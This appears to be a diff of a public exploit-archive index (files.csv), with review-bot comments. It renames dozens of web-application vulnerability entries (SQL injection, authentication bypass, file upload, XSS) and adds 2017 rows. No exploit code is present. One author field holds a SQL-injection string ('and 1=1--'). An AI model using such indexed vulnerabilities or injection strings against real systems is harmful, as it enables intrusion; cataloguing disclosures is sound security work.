11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0
|
||||
11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 - (articlemodule) SQL Injection",2010-02-07,"T u R c O",php,webapps,0
|
||||
11350,platforms/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection",2010-02-07,anonymous,php,webapps,0
|
||||
11352,platforms/php/webapps/11352.txt,"Joomla! Component com_productbook - SQL Injection",2010-02-07,snakespc,php,webapps,0
|
||||
11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-07,"Milos Zivanovic",php,webapps,0
|
||||
11354,platforms/php/webapps/11354.txt,"Killmonster 2.1 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11354,platforms/php/webapps/11354.txt,"Killmonster 2.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11355,platforms/php/webapps/11355.txt,"EncapsCMS 0.3.6 - (config[path]) Remote File Inclusion",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11356,platforms/php/webapps/11356.txt,"Rostermain 1.1 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11356,platforms/php/webapps/11356.txt,"Rostermain 1.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11357,platforms/php/webapps/11357.txt,"Uiga Business Portal - SQL Injection / Cross-Site Scripting",2010-02-07,"Sioma Labs",php,webapps,0
|
||||
11358,platforms/php/webapps/11358.txt,"TinyMCE WYSIWYG Editor - Multiple Vulnerabilities",2010-02-07,mc2_s3lector,php,webapps,0
|
||||
11359,platforms/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Inclusion",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0
|
||||
|
@ -22404,7 +22407,7 @@ id,file,description,date,author,platform,type,port
|
|||
11361,platforms/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure",2010-02-09,ViRuSMaN,asp,webapps,0
|
||||
11365,platforms/php/webapps/11365.txt,"CPA Site Solutions - Arbitrary File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0
|
||||
11366,platforms/php/webapps/11366.txt,"NewsLetter Tailor - Database Backup Dump",2010-02-09,ViRuSMaN,php,webapps,0
|
||||
11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - (Authentication Bypass) SQL Injection",2010-02-09,ViRuSMaN,php,webapps,0
|
||||
11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - Authentication Bypass",2010-02-09,ViRuSMaN,php,webapps,0
|
||||
11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,HackXBack,php,webapps,0
|
||||
11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,cp77fk4r,asp,webapps,0
|
||||
11375,platforms/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0
|
||||
|
@ -22440,7 +22443,7 @@ id,file,description,date,author,platform,type,port
|
|||
11430,platforms/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,php,webapps,0
|
||||
11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0
|
||||
11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0
|
||||
11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - 'orderlinks' Parameter SQL Injection",2010-02-13,Gamoscu,php,webapps,0
|
||||
11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0
|
||||
11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0
|
||||
11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0
|
||||
|
@ -22532,23 +22535,23 @@ id,file,description,date,author,platform,type,port
|
|||
11580,platforms/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,ViRuSMaN,aix,webapps,0
|
||||
11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - news.php SQL Injection",2010-02-27,"Easy Laster",php,webapps,0
|
||||
11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0
|
||||
11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusion",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11588,platforms/php/webapps/11588.txt,"phpMySite - Cross-Site Scripting / SQL Injection",2010-02-27,Crux,php,webapps,0
|
||||
11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps,0
|
||||
11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory - SQL Injection",2010-02-27,Crux,php,webapps,0
|
||||
11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11595,platforms/php/webapps/11595.php,"Joomla! Component com_paxgallery - Blind Injection",2010-02-27,snakespc,php,webapps,0
|
||||
11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps,0
|
||||
11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0
|
||||
11600,platforms/php/webapps/11600.txt,"Uiga Fan Club - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps,0
|
||||
11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - (Authentication Bypass) SQL Injection",2010-02-28,cr4wl3r,php,webapps,0
|
||||
11602,platforms/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - Authentication Bypass",2010-02-28,cr4wl3r,php,webapps,0
|
||||
11603,platforms/php/webapps/11603.txt,"Joomla! Component com_yanc - SQL Injection",2010-02-28,snakespc,php,webapps,0
|
||||
11604,platforms/php/webapps/11604.php,"Joomla! Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,php,webapps,0
|
||||
11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,cr4wl3r,php,webapps,0
|
||||
11606,platforms/asp/webapps/11606.txt,"Majoda CMS - (Authentication Bypass) SQL Injection",2010-02-28,Phenom,asp,webapps,0
|
||||
11606,platforms/asp/webapps/11606.txt,"Majoda CMS - Authentication Bypass",2010-02-28,Phenom,asp,webapps,0
|
||||
11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - 'id' SQL Injection",2010-03-01,kaMtiEz,php,webapps,0
|
||||
11610,platforms/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0
|
||||
11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Download",2010-03-02,indoushka,asp,webapps,0
|
||||
|
@ -22688,7 +22691,7 @@ id,file,description,date,author,platform,type,port
|
|||
11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11831,platforms/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11832,platforms/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11833,platforms/php/webapps/11833.txt,"4x CMS r26 - (Authentication Bypass) SQL Injection",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11833,platforms/php/webapps/11833.txt,"4x CMS r26 - Authentication Bypass",2010-03-21,cr4wl3r,php,webapps,0
|
||||
11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - Authentication Bypass",2010-03-22,cr4wl3r,php,webapps,0
|
||||
11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0
|
||||
14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
|
||||
|
@ -22768,8 +22771,8 @@ id,file,description,date,author,platform,type,port
|
|||
11951,platforms/php/webapps/11951.txt,"E-book Store - Multiple Vulnerabilities (1)",2010-03-30,indoushka,php,webapps,0
|
||||
11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0
|
||||
11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0
|
||||
11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - (Authentication Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0
|
||||
11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - (Authentication Bypass) SQL Injection",2010-03-30,mat,php,webapps,0
|
||||
11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - Authentication Bypass",2010-03-30,indoushka,php,webapps,0
|
||||
11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - Authentication Bypass",2010-03-30,mat,php,webapps,0
|
||||
11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",multiple,webapps,0
|
||||
11965,platforms/php/webapps/11965.txt,"kora - Reinstall Admin Information",2010-03-30,indoushka,php,webapps,0
|
||||
11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Arbitrary File Upload",2010-03-30,indoushka,php,webapps,0
|
||||
|
@ -22958,7 +22961,7 @@ id,file,description,date,author,platform,type,port
|
|||
12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
|
||||
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
|
||||
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - (Authentication Bypass) SQL Injection",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
|
||||
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
|
||||
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
|
||||
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
|
@ -23231,11 +23234,11 @@ id,file,description,date,author,platform,type,port
|
|||
12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal)",2010-05-21,"Richard Brain",windows,webapps,0
|
||||
12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0
|
||||
12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0
|
||||
12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
|
||||
12686,platforms/php/webapps/12686.txt,"Online University - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps,0
|
||||
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
|
||||
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
|
||||
12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
|
||||
12691,platforms/php/webapps/12691.txt,"Online Job Board - Authentication Bypass",2010-05-21,cr4wl3r,php,webapps,0
|
||||
14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
12692,platforms/php/webapps/12692.txt,"WordPress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0
|
||||
12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0
|
||||
|
@ -24007,7 +24010,7 @@ id,file,description,date,author,platform,type,port
|
|||
15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - Blind SQL Injection",2010-09-27,**RoAd_KiLlEr**,php,webapps,0
|
||||
15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",php,webapps,0
|
||||
15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0
|
||||
15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)",2010-09-28,Abysssec,php,webapps,0
|
||||
15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,php,webapps,0
|
||||
15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0
|
||||
15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Flaws",2010-09-28,"Pablo Milano",php,webapps,0
|
||||
15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0
|
||||
|
@ -24827,7 +24830,7 @@ id,file,description,date,author,platform,type,port
|
|||
17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
|
||||
17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
|
||||
17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
|
||||
17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
|
||||
17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
|
||||
17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0
|
||||
17570,platforms/php/webapps/17570.txt,"MusicBox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,php,webapps,0
|
||||
17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0
|
||||
|
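Review bot: The rename of 17562 only adds spaces around the slash and keeps the "(Authentication Bypass / Cookie) SQL Injection" form, while the other rows touched by this commit (for example 15141 in the previous hunk) are reduced to a plain "Authentication Bypass". Pick one convention for the whole file. If the parenthetical form stays here because the cookie detail matters, a short note in the commit message would explain the exception.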
@ -25449,7 +25452,7 @@ id,file,description,date,author,platform,type,port
|
|||
18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0
|
||||
19012,platforms/php/webapps/19012.txt,"WordPress Plugin Front File Manager 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0
|
||||
19013,platforms/php/webapps/19013.txt,"WordPress Plugin Easy Contact Forms Export 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0
|
||||
19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass (SQL Injection)",2012-06-07,"Yakir Wizman",php,webapps,0
|
||||
19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass",2012-06-07,"Yakir Wizman",php,webapps,0
|
||||
19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps,0
|
||||
19007,platforms/php/webapps/19007.php,"PHPNet 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0
|
||||
19008,platforms/php/webapps/19008.php,"WordPress Plugin Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0
|
||||
|
@ -27012,7 +27015,7 @@ id,file,description,date,author,platform,type,port
|
|||
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
|
||||
24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,cr4wl3r,php,webapps,0
|
||||
24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0
|
||||
24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - (Authentication Bypass) SQL Injection",2013-02-21,cr4wl3r,php,webapps,0
|
||||
24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - Authentication Bypass",2013-02-21,cr4wl3r,php,webapps,0
|
||||
24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0
|
||||
24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0
|
||||
24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -28611,7 +28614,7 @@ id,file,description,date,author,platform,type,port
|
|||
26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0
|
||||
26868,platforms/php/webapps/26868.txt,"jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection",2005-12-19,Zbigniew,php,webapps,0
|
||||
26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0
|
||||
26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
|
||||
26871,platforms/php/webapps/26871.txt,"PlaySms 0.8 - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
|
||||
26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0
|
||||
26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0
|
||||
26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0
|
||||
|
@ -29544,7 +29547,7 @@ id,file,description,date,author,platform,type,port
|
|||
28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0
|
||||
28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0
|
||||
28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0
|
||||
28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass (SQL Injection)",2013-09-06,shiZheni,php,webapps,0
|
||||
28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass",2013-09-06,shiZheni,php,webapps,0
|
||||
28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0
|
||||
28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
|
||||
28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0
|
||||
|
@ -30217,6 +30220,7 @@ id,file,description,date,author,platform,type,port
|
|||
29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
|
||||
29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
|
||||
29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0
|
||||
41035,platforms/php/webapps/41035.txt,"Airbnb Clone Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
|
||||
29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
|
||||
29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0
|
||||
|
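Review bot: The added row for 41035 (dated 2017-01-11) lands between 29051 and 29053, both 2006 entries, while the rest of this batch is appended at the end of the file, where 41034 is followed directly by 41036. Unless the position is intentional, move the 41035 row into that gap so the new entries stay together and a reader diffing the tail of files.csv sees the complete batch.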
@ -35326,7 +35330,7 @@ id,file,description,date,author,platform,type,port
|
|||
37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0
|
||||
37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0
|
||||
37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,php,webapps,0
|
||||
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Authentication Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0
|
||||
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - Authentication Bypass",2015-06-15,"walid naceri",php,webapps,0
|
||||
37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0
|
||||
37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0
|
||||
37331,platforms/php/webapps/37331.py,"WHMCS - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0
|
||||
|
@ -36743,7 +36747,7 @@ id,file,description,date,author,platform,type,port
|
|||
40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
|
||||
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
|
||||
40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000
|
||||
40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
|
||||
40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
|
||||
40220,platforms/php/webapps/40220.txt,"WordPress Plugin Add From Server < 3.3.2 - Cross-Site Request Forgery (Arbitrary File Upload)",2016-08-08,"Edwin Molenaar",php,webapps,80
|
||||
40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80
|
||||
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
|
||||
|
@ -36960,8 +36964,17 @@ id,file,description,date,author,platform,type,port
|
|||
41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
|
||||
41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
|
||||
41009,platforms/php/webapps/41009.txt,"Starting Page 1.3 - 'category' Parameter SQL Injection",2017-01-11,"Ben Lee",php,webapps,0
|
||||
41010,platforms/php/webapps/41010.txt,"My link trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
|
||||
41010,platforms/php/webapps/41010.txt,"My Link Trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
|
||||
41011,platforms/php/webapps/41011.txt,"b2evolution 6.8.2 - Arbitrary File Upload",2016-12-29,"Li Fei",php,webapps,0
|
||||
41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0
|
||||
41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
|
||||
41023,platforms/php/webapps/41023.txt,"Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41024,platforms/php/webapps/41024.txt,"Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41028,platforms/php/webapps/41028.txt,"Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
|
||||
41029,platforms/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
|
||||
41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection",2017-01-11,v3n0m,php,webapps,0
|
||||
41033,platforms/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",hardware,webapps,0
|
||||
41034,platforms/php/webapps/41034.txt,"School Management Software 2.75 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41036,platforms/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
